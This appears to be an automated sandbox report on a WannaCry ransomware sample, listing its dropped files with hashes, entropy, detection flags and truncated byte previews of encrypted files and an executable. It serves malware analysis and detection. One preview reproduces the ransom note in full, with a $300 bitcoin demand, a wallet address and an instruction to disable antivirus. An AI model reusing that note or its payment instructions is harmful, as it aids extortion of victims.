                                                                                      Preview:PK.........[.J.."@..5...5.D...ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeUT....i.Y.j.Yux.............c..|.!9....T....I..^.Z.@.$:...-.h...*.. ..x{&:....a..........D~&....^A.@N.....(.b..U.a.....f.N)./?...e(...34#.......R.......[).T....Zw.@........?..dsTT.u..PM....qy........@.C.....6..........?./#....BB.....Jq..Gp..`C(.i......m.......b1.q..p.....~...1N-....e...F.O..EWFH.@;..q....E.!!.=.dUyM_hl.[mb}...=..?.bx._.Ey..;.F>.S..G....,R.3qS.:."....QD..........C..p..G6rS.[....~m...s.-..i...O....1N..K.A.M._-|. ...7..~.H*.p..s)C....U.EA27 ......7..$._R'%....7.#....UB...sj....F..O.8.x....^n...].4..yO?..*|..Mdq..^...!zj...2.>{%.F.....?S...8..+.4..=X~.C.<.Sz...42..f........O.-.u-%B.....}~....?.i..D.........Oi.sLF.............. ?.}..I........9...I.E.Z..*(....../.....L.A..Q.%:....&.h.>q.gj......U.Fc(..+m.,.U\u0.*.......B.jNy..Z..h..@...9A}[....#............F.,...e.0.%....w.H.e.eV.7.......9.r(..4.......`..83l.Fx...]X...ll.d........K.l\.E
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):245760
                                                                                      Entropy (8bit):6.278920408390635
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                                                      MD5:7BF2B57F2A205768755C07F238FB32CC
                                                                                      SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                                                      SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                                                      SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8384408053971715
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bklisWJZfq6uiARIjdOl0SD+8OnJUPOdTb/A8AmY9aLCGcS8ZWXt:bkAsiAG5gr+8vPOhbMcf+Zc
                                                                                      MD5:6258E672A4C4A11DE0A39D6956910A19
                                                                                      SHA1:A6B0647B0DE187B099E29CA0C32E4215EBD7BF1E
                                                                                      SHA-256:597EC488242AFFCAE9260CC5105FE951718293AA6D98273DF73EDB74871FB89E
                                                                                      SHA-512:6B6D8DD011595F76727F9F7232F8875C8650609F6754A0513672CF661B0E24F692C6E2387D7E128F457807A4E10C4745B22581C41826D67A90BC3CE6D907E91B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....g..~.l.S.U.x.{..0aP#Q...F....&b.....I..qD..1..n.yCw;..4,d..&G..!.....A...7b).t.....-Xxz.y..O0.G....aE.....>..}..oS.zX..E......q....&...o.y5.....H4..G...,5..WB....f.SR`.t.;n.=......7.[.t.....bSj.../....8.....m......^.v.........v..1.....cq~..................c..r==....|..j.7....}.>....,n.D.mD..2..........+<.X.e....D....nh.]oj..}..c..*...K.,@.dgk)A.?....j.e...0X.g@..Jk..C..$Q<.......d.....O|...e.wC.3..I..g...;....N.i$gD.P.!.k.=.....@.O.yE|r..>..[n.g.9.6.@,..F.\...!...P..TP.oF<..wu}]....0<...*m.E.#..V..D..".4..l$.Q...n...F!n..,mb...0.U.T...0e....,.A..~y....".............<......={.D.@w....D...0A.l...J.u1.2J:.t,...o...]4.|...K.....Z=..!...#.ux...k&x>..$_..uc.o.o1....8........9.0Y...[.#+.H....-4.G.... .....Ms8w.lt...B.......@=?.X7<T.Ej..|O...6.........OE6......f..0.3..F\Z'.i....|.]......M..+v.......-..VAO..}../....s}w?..w..........P..#2.....a$.?0.+.Z..z.....#f..,......FERn.].@..2.RR.]....5g....'8.7ty...B.. .73.....PWa..?#..~~.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8384408053971715
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bklisWJZfq6uiARIjdOl0SD+8OnJUPOdTb/A8AmY9aLCGcS8ZWXt:bkAsiAG5gr+8vPOhbMcf+Zc
                                                                                      MD5:6258E672A4C4A11DE0A39D6956910A19
                                                                                      SHA1:A6B0647B0DE187B099E29CA0C32E4215EBD7BF1E
                                                                                      SHA-256:597EC488242AFFCAE9260CC5105FE951718293AA6D98273DF73EDB74871FB89E
                                                                                      SHA-512:6B6D8DD011595F76727F9F7232F8875C8650609F6754A0513672CF661B0E24F692C6E2387D7E128F457807A4E10C4745B22581C41826D67A90BC3CE6D907E91B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....g..~.l.S.U.x.{..0aP#Q...F....&b.....I..qD..1..n.yCw;..4,d..&G..!.....A...7b).t.....-Xxz.y..O0.G....aE.....>..}..oS.zX..E......q....&...o.y5.....H4..G...,5..WB....f.SR`.t.;n.=......7.[.t.....bSj.../....8.....m......^.v.........v..1.....cq~..................c..r==....|..j.7....}.>....,n.D.mD..2..........+<.X.e....D....nh.]oj..}..c..*...K.,@.dgk)A.?....j.e...0X.g@..Jk..C..$Q<.......d.....O|...e.wC.3..I..g...;....N.i$gD.P.!.k.=.....@.O.yE|r..>..[n.g.9.6.@,..F.\...!...P..TP.oF<..wu}]....0<...*m.E.#..V..D..".4..l$.Q...n...F!n..,mb...0.U.T...0e....,.A..~y....".............<......={.D.@w....D...0A.l...J.u1.2J:.t,...o...]4.|...K.....Z=..!...#.ux...k&x>..$_..uc.o.o1....8........9.0Y...[.#+.H....-4.G.... .....Ms8w.lt...B.......@=?.X7<T.Ej..|O...6.........OE6......f..0.3..F\Z'.i....|.]......M..+v.......-..VAO..}../....s}w?..w..........P..#2.....a$.?0.+.Z..z.....#f..,......FERn.].@..2.RR.]....5g....'8.7ty...B.. .73.....PWa..?#..~~.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.865195666057223
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk4OdLhNFMsVo83wla4+N7P8S3udN2adj1mvpm082HjCrykn2NPAQ/ZAD4H:bk4OR9REM7zedkadjIm08CCrydNP/Ae
                                                                                      MD5:1CD52336D44C5BEF3535FB3DE459F548
                                                                                      SHA1:BF390D55C8F514AC4B2918B1904C86AB0FFCD3E4
                                                                                      SHA-256:CCD8138AA47D0A880ED5B532B2F8EBCEB6E9541316C78A14448150E3CFCBDD59
                                                                                      SHA-512:FED17FFE9FBDC892DAD87D3819CE0A6C5E3DBB4306C706230B956C588E8652DC83296F9A4B478575CB6003EC8E5C84BF6CB8E9BCBB2647978AE65E6FE725D0B4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......b.'<../P....fq@[......Jze#..u2.^C<Y.F....Y.;..np[#..]aD....o3..ho'......0.......<..Q4Z.S.th..Z0......M;..0......*aZ[D..F.B9%..}.9........].V&e.-.6Vj....#.....Rk`.Qtw.4A.......fH......G.MP.Nq.....`.....:.x.4...%'%j.......t..}.*.J>H~..,U.n............=..%........m...T..'M..s^b.`p?.Dr.,a.W..\.3..9...B..<.C7.....LO&.E.\..7.......o........-.hv..... ..$B."_J...l.......Y...Ts$`...........]..v..Q.&....=.....A..#q ...q.1a7..u(D.X./nd.#WS.kVR.4...P.....MZ.Ar.k.7..J.53.s...O...b....\....B.5=..W.t..G....h....B;j.Ix_Q.Q...c..;..2R.[....8..=.......XU.m..c...-...x(.2..-.m.d9.l...q$N\e.....vB.4.v.f..f....W....]P..pK...@....'.]6.o..o.s`(.H...K...)[......Tx...d.....]....t..".\..qm=,.......,.....]'.........vT.E7.%.9.5.\...D.7e...j..#>.x..gL.N.2h......I.a...!.h..Gy..gS........x..s4.....fg+....^../..%...9.j..KOt..E....M.........J.H.......H+<k%.!....\..R..m.0..^..$.b...U&.5...6.j....".....}_...c..)%L%b...{.....3....3...N...^.TG_{..f.R....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.865195666057223
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk4OdLhNFMsVo83wla4+N7P8S3udN2adj1mvpm082HjCrykn2NPAQ/ZAD4H:bk4OR9REM7zedkadjIm08CCrydNP/Ae
                                                                                      MD5:1CD52336D44C5BEF3535FB3DE459F548
                                                                                      SHA1:BF390D55C8F514AC4B2918B1904C86AB0FFCD3E4
                                                                                      SHA-256:CCD8138AA47D0A880ED5B532B2F8EBCEB6E9541316C78A14448150E3CFCBDD59
                                                                                      SHA-512:FED17FFE9FBDC892DAD87D3819CE0A6C5E3DBB4306C706230B956C588E8652DC83296F9A4B478575CB6003EC8E5C84BF6CB8E9BCBB2647978AE65E6FE725D0B4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......b.'<../P....fq@[......Jze#..u2.^C<Y.F....Y.;..np[#..]aD....o3..ho'......0.......<..Q4Z.S.th..Z0......M;..0......*aZ[D..F.B9%..}.9........].V&e.-.6Vj....#.....Rk`.Qtw.4A.......fH......G.MP.Nq.....`.....:.x.4...%'%j.......t..}.*.J>H~..,U.n............=..%........m...T..'M..s^b.`p?.Dr.,a.W..\.3..9...B..<.C7.....LO&.E.\..7.......o........-.hv..... ..$B."_J...l.......Y...Ts$`...........]..v..Q.&....=.....A..#q ...q.1a7..u(D.X./nd.#WS.kVR.4...P.....MZ.Ar.k.7..J.53.s...O...b....\....B.5=..W.t..G....h....B;j.Ix_Q.Q...c..;..2R.[....8..=.......XU.m..c...-...x(.2..-.m.d9.l...q$N\e.....vB.4.v.f..f....W....]P..pK...@....'.]6.o..o.s`(.H...K...)[......Tx...d.....]....t..".\..qm=,.......,.....]'.........vT.E7.%.9.5.\...D.7e...j..#>.x..gL.N.2h......I.a...!.h..Gy..gS........x..s4.....fg+....^../..%...9.j..KOt..E....M.........J.H.......H+<k%.!....\..R..m.0..^..$.b...U&.5...6.j....".....}_...c..)%L%b...{.....3....3...N...^.TG_{..f.R....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8503457989789585
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkKI4r+svraMP8HCvJ2nnHO330LWtPzgKa0O3msrGLbKNWT5xTXkPkDjX:bkKIpstvwnu3xIRaLbeAxoPgD
                                                                                      MD5:AD617F3D1FA77A5E75C5DAF0A4EB4F62
                                                                                      SHA1:3E277485DDBA51FCE26B5BE506D75E745DDA85BA
                                                                                      SHA-256:8D79CE3FD976CF436AB54E9DC8FBAC065825E7000207F58D4AD5CD01E7400405
                                                                                      SHA-512:5BEB31A8655BEE61521746EDA45E8CC17689C8D38DAB6B26F577232A7D7D726F6803845798785716018BFBBD0772DDB5FC5900D08CD112D7B98040D44A2F0A8E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....M.(.D..)Y.....Ib...X.....0i..a.Ao...2....S.uG.,....>.%.+G...(0.~O..<w..,...z\....3W$.w).>W.........>.`".K...I.. .4.{_....[.u.y..I..2q#...2.;..S...."]'..u......F.E..{S"......V.%Ln.:c265.......g.\.b8..A..,k...qy.i8.........G....(+...1...a.*.7............*;Zx.".Z...h.}M.<P....!u..r..........q...|.Y.>...9.r.#I.......O.%N....+....P^...j3{.N.a. i'.;.7+a........a.J..z..$<7.......5.D...N.O6.:....rKR..,+b.n........n..bu.iH]ENA.Mq.{..#......9.m...a.P.32.e.....\.....R.Y..G...C.....d.Ks.q....H....<..MS..Y..K...q.24..}"Lz..'P$..#WD.a....~g.8.,;...Q........yH.p.9.c......Cr....6.W..?....H...a...5V......1x.{..,..A9.(.7.J...rR.g..G.v>. .#......\(.A6..O..;.N.......ZmT..YB.>Z\!.......'8......ld.....9...%......'.....?O..........[..p.m.;...r.b..6....5W.. ....]9.t%.vx.E...Wx.W.N..?~..u....v.-%.}[....0...#.....:.e2....p..*......McI..;..;|hv.bH6BI..d..>....p...9R......%@(...&y....r-....KS..........I]..n....O.I.+H...S..+.....iow^...`3e.#...^".
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8503457989789585
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkKI4r+svraMP8HCvJ2nnHO330LWtPzgKa0O3msrGLbKNWT5xTXkPkDjX:bkKIpstvwnu3xIRaLbeAxoPgD
                                                                                      MD5:AD617F3D1FA77A5E75C5DAF0A4EB4F62
                                                                                      SHA1:3E277485DDBA51FCE26B5BE506D75E745DDA85BA
                                                                                      SHA-256:8D79CE3FD976CF436AB54E9DC8FBAC065825E7000207F58D4AD5CD01E7400405
                                                                                      SHA-512:5BEB31A8655BEE61521746EDA45E8CC17689C8D38DAB6B26F577232A7D7D726F6803845798785716018BFBBD0772DDB5FC5900D08CD112D7B98040D44A2F0A8E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....M.(.D..)Y.....Ib...X.....0i..a.Ao...2....S.uG.,....>.%.+G...(0.~O..<w..,...z\....3W$.w).>W.........>.`".K...I.. .4.{_....[.u.y..I..2q#...2.;..S...."]'..u......F.E..{S"......V.%Ln.:c265.......g.\.b8..A..,k...qy.i8.........G....(+...1...a.*.7............*;Zx.".Z...h.}M.<P....!u..r..........q...|.Y.>...9.r.#I.......O.%N....+....P^...j3{.N.a. i'.;.7+a........a.J..z..$<7.......5.D...N.O6.:....rKR..,+b.n........n..bu.iH]ENA.Mq.{..#......9.m...a.P.32.e.....\.....R.Y..G...C.....d.Ks.q....H....<..MS..Y..K...q.24..}"Lz..'P$..#WD.a....~g.8.,;...Q........yH.p.9.c......Cr....6.W..?....H...a...5V......1x.{..,..A9.(.7.J...rR.g..G.v>. .#......\(.A6..O..;.N.......ZmT..YB.>Z\!.......'8......ld.....9...%......'.....?O..........[..p.m.;...r.b..6....5W.. ....]9.t%.vx.E...Wx.W.N..?~..u....v.-%.}[....0...#.....:.e2....p..*......McI..;..;|hv.bH6BI..d..>....p...9R......%@(...&y....r-....KS..........I]..n....O.I.+H...S..+.....iow^...`3e.#...^".
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.845882391076312
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkbBNbSwabvO1rviEwc5hjltGjfbuvRq49Zj0GB8RBuJe74C6xP7pzp4Usw4h6yW:bklNbztJ6ahJtUbuhHUMJE4CEpzp4gOA
                                                                                      MD5:D46EE1A978ED440CA9512CBF13E4549C
                                                                                      SHA1:9D79EE5256A08E01C940681FA2ED25FAB8381149
                                                                                      SHA-256:269CE2A9F71C288FA703869840D9CA83037FB519B14C0842776502EEE21D5C95
                                                                                      SHA-512:F088DB1A7164207E549D89CEEF0ACAF5C5F00C194194E242B7D85848E8E75FD4994E3AF0024C98F388D43826496B673CBFEA294CF2C92C492CFF9CC14F301820
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....a`+..bw....s.o(!..l...JbR)....;.....q.>..a.\.}.nl@<$<F.......,...1./....0=K...e.z..\..Q...D&.Ib.#z0.M|yj;C. .3.eLn|....2.Q./L.?.K/.y.6...R...:{.Br5[.^.$..B0...0_..^.o....LX7....]5"%.|.....H(......f...]...xVZq......8)?....B..#[....c....tSz..*.6b...#............8.;.*....@.....=..6.-.S.X.....I..9.=...0..mG.9..u.@....F*......1...e....W./8.0 .|*..o.....D....;6....4G.o.%'B...0..`..d..)`L......f# ...jx..O?...}....|E0l.9W......K.+G.....l..7.......9.)...b....Ma.o...D.:.D].....).`.t..J.r*...8'...#<./.vc.,.h(>EI...^.x...W.2%......%t'.l.n.F.iC...IXLg;n....k....h............{..0..^.|...,-.........iX..=.z*#...:T~.S.f....e.6Y...U..c...H.5,....yp.oRY.UwE.29..h.+...z0...`..M.......n+..D.h^.4}...&.....g1p..........C../.....'..{.I.N.Jh"......c.l.I.4b......i......9ue...cN..f".I....u....Vv.1p....j.2..q.?7g;..=...T.z..C...5i..:.........I2.a+..$..J.,eB....>.>.".u`i..[...j.J.%`..z|.B.y.h..a....`...j..~G..Ca.....mo.ii.Zo...IA.#..6u.5..r..f.......l
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.845882391076312
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkbBNbSwabvO1rviEwc5hjltGjfbuvRq49Zj0GB8RBuJe74C6xP7pzp4Usw4h6yW:bklNbztJ6ahJtUbuhHUMJE4CEpzp4gOA
                                                                                      MD5:D46EE1A978ED440CA9512CBF13E4549C
                                                                                      SHA1:9D79EE5256A08E01C940681FA2ED25FAB8381149
                                                                                      SHA-256:269CE2A9F71C288FA703869840D9CA83037FB519B14C0842776502EEE21D5C95
                                                                                      SHA-512:F088DB1A7164207E549D89CEEF0ACAF5C5F00C194194E242B7D85848E8E75FD4994E3AF0024C98F388D43826496B673CBFEA294CF2C92C492CFF9CC14F301820
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....a`+..bw....s.o(!..l...JbR)....;.....q.>..a.\.}.nl@<$<F.......,...1./....0=K...e.z..\..Q...D&.Ib.#z0.M|yj;C. .3.eLn|....2.Q./L.?.K/.y.6...R...:{.Br5[.^.$..B0...0_..^.o....LX7....]5"%.|.....H(......f...]...xVZq......8)?....B..#[....c....tSz..*.6b...#............8.;.*....@.....=..6.-.S.X.....I..9.=...0..mG.9..u.@....F*......1...e....W./8.0 .|*..o.....D....;6....4G.o.%'B...0..`..d..)`L......f# ...jx..O?...}....|E0l.9W......K.+G.....l..7.......9.)...b....Ma.o...D.:.D].....).`.t..J.r*...8'...#<./.vc.,.h(>EI...^.x...W.2%......%t'.l.n.F.iC...IXLg;n....k....h............{..0..^.|...,-.........iX..=.z*#...:T~.S.f....e.6Y...U..c...H.5,....yp.oRY.UwE.29..h.+...z0...`..M.......n+..D.h^.4}...&.....g1p..........C../.....'..{.I.N.Jh"......c.l.I.4b......i......9ue...cN..f".I....u....Vv.1p....j.2..q.?7g;..=...T.z..C...5i..:.........I2.a+..$..J.,eB....>.>.".u`i..[...j.J.%`..z|.B.y.h..a....`...j..~G..Ca.....mo.ii.Zo...IA.#..6u.5..r..f.......l
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.850813189802012
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkjvUwSLkSJycPZwiCsCic/WuRPOJshGb+2qBmS4ry52Q+Dfbpl3zGH5DJw6Ar7d:bkIwSLD8SSf/+Fum452P5l3z4Q6UTx
                                                                                      MD5:8ACA1DAA8CEEC70971F12211E25974BE
                                                                                      SHA1:0367EB486C9FE9AAD7D0771577426E44CBEBDC74
                                                                                      SHA-256:BA78EB1D0081FFCD4FF320B42067D3EB469D8B2D8D228EF9A5A845E4159C6CF8
                                                                                      SHA-512:CA2303545F15613DF16685D05A3CD6C7E60D6D7BAC6508BE1AA7AAA27E592A97A72EFE5622B8698D3C231F66B42F297A600000B83FB99FC2C84285679059153A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....1.... .Z!.a.......4....V,)O.....!........F1.h/t`.G.5S...........>.#...cxRQR.&(.h.OS....'XC.c6.=f..?!A...9..O..QK.Q.J..... X-..*.'@.....!..b.nj...b...BL...'(.W..A....AgR..........(.......J}o&....^.`N.%.....(..o.f=8(.:.z........(2:Egav..R.#..*.MAl..............p.^...L...&xd.._...!:..,.}.k..b.=......y$;.A[.7.L.~..j.53..!S/....sU ...g.H.f.$.H.w.]8h...x....m,...Nr...}6.$.+.^.3..[..!#.*5..0...M.....k.....H....Z.H...yw.a)Y.'......8L......Z.#.cfIz...........F...k.`.....m,.d..|P..f@....l..PL(..Q. I.Lk...u-....6.......@gL...i`...9..~...v.G.n..n....?....n..._.{.E...C.......H.J...`...Mp...)..)Y..P^.3Z.dl.GA.9.7t.WVY..2.G....M...h......U.)Rh....+...X2.-.....*.#..*...7.+.F..YlF.'.....3.A@!fEq.....z.s...F...S..V.g.|...6.`.9d.1Zk,,.ggO.O.c............<*>...V..{..s.^.YKTo...z.?".[0,e...S..}..r..)...........9....eOc}.Rv..)+...Q.`.5u.."%cb.1Z.`.Z../.f.s.k.`.vko....].sXd&..._x...17,&....N.....Gx9..T...y...\..7.."(|.$.'..W..EO.....^...QU.,...Z_Z.z..pB
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.850813189802012
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkjvUwSLkSJycPZwiCsCic/WuRPOJshGb+2qBmS4ry52Q+Dfbpl3zGH5DJw6Ar7d:bkIwSLD8SSf/+Fum452P5l3z4Q6UTx
                                                                                      MD5:8ACA1DAA8CEEC70971F12211E25974BE
                                                                                      SHA1:0367EB486C9FE9AAD7D0771577426E44CBEBDC74
                                                                                      SHA-256:BA78EB1D0081FFCD4FF320B42067D3EB469D8B2D8D228EF9A5A845E4159C6CF8
                                                                                      SHA-512:CA2303545F15613DF16685D05A3CD6C7E60D6D7BAC6508BE1AA7AAA27E592A97A72EFE5622B8698D3C231F66B42F297A600000B83FB99FC2C84285679059153A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....1.... .Z!.a.......4....V,)O.....!........F1.h/t`.G.5S...........>.#...cxRQR.&(.h.OS....'XC.c6.=f..?!A...9..O..QK.Q.J..... X-..*.'@.....!..b.nj...b...BL...'(.W..A....AgR..........(.......J}o&....^.`N.%.....(..o.f=8(.:.z........(2:Egav..R.#..*.MAl..............p.^...L...&xd.._...!:..,.}.k..b.=......y$;.A[.7.L.~..j.53..!S/....sU ...g.H.f.$.H.w.]8h...x....m,...Nr...}6.$.+.^.3..[..!#.*5..0...M.....k.....H....Z.H...yw.a)Y.'......8L......Z.#.cfIz...........F...k.`.....m,.d..|P..f@....l..PL(..Q. I.Lk...u-....6.......@gL...i`...9..~...v.G.n..n....?....n..._.{.E...C.......H.J...`...Mp...)..)Y..P^.3Z.dl.GA.9.7t.WVY..2.G....M...h......U.)Rh....+...X2.-.....*.#..*...7.+.F..YlF.'.....3.A@!fEq.....z.s...F...S..V.g.|...6.`.9d.1Zk,,.ggO.O.c............<*>...V..{..s.^.YKTo...z.?".[0,e...S..}..r..)...........9....eOc}.Rv..)+...Q.`.5u.."%cb.1Z.`.Z../.f.s.k.`.vko....].sXd&..._x...17,&....N.....Gx9..T...y...\..7.."(|.$.'..W..EO.....^...QU.,...Z_Z.z..pB
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.831496670032283
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk+j5HSPxC9B3b6GqIA0ZgkX0TXxwS5+HvLjTkbS5yTkRErZv13D1WxPqsCCs:bkwexC9B3ZK0ZgkXYXxwXfTkbYKu691x
                                                                                      MD5:F48FF7E8E11C43204F678C81A778EFB3
                                                                                      SHA1:AFE4A7C41DA671BEC4B7E38EADFF907CBF6D64BA
                                                                                      SHA-256:C6F383B66E24D725E4B2187ABBDF6E4DEE073152A1446FEF290FDFC6C49F3A6F
                                                                                      SHA-512:80560DC42809AF56A4F7388E5465BAB606FDAC82E4AEF7399391C73C892B596CC3E544F5A46AD4F1A435A7C5895EA518E1CF4045D6A744853D4A6CE4542C3BB0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......P....n1.....?....|"a.k.A..k-...n#..9./...f.....&...\..g....v.....R.B.fE...SDP(b.}....c.5.9..,O,..)I...K......tW.S..F..hz...Q.S.t.......6...68U.r.E..'P.#..:]X....w..*...M.B.e.vrZ.I.2.....^.MT................j.x[mR.@.......K.'[T.e.^.22..'.}.&.9@................."A=`$t/....H|.t.F.31S.'.KZG^K.~T..m...V.x...Ph....#...]..d..q..1.....a.)..}:#...._.)K...Z...@..U,I..'.....[?"....'!..U..Hu.G#.k..GD.i3.T.B......Y.et.9..p....00'.U...(.......!..2..5.....[8I+...hs`d......m.c..G..(w..sL...rg+....JV....3.Q......F....O........C.3..n}..h...........O.z...O.P...<MCx.l..%..?s0..@.`.Z../..T.Y...p...N....)ke.O....)..W;...LS....Wv..=y..R....z0&..Q>...\~.j.....'cA.....?.}.L.t..]..@.R....V5.Z+{.........~..2..+.k*.x@..[.^.F...{..!d..W%.....!.X...v.u..`;..g[....Oig...{m...P.0.!l.....y.`.......6.L......T.........g./..IOl.3y.s6h.."...1..p...M0(......rXl..."....&eW|.+..Z.8.r..}L.|..t...%.29rS./5.!.{$7.wD..xsm..8.Jh..g...K..5G|r....4.:my.TB.5A..........{w!...
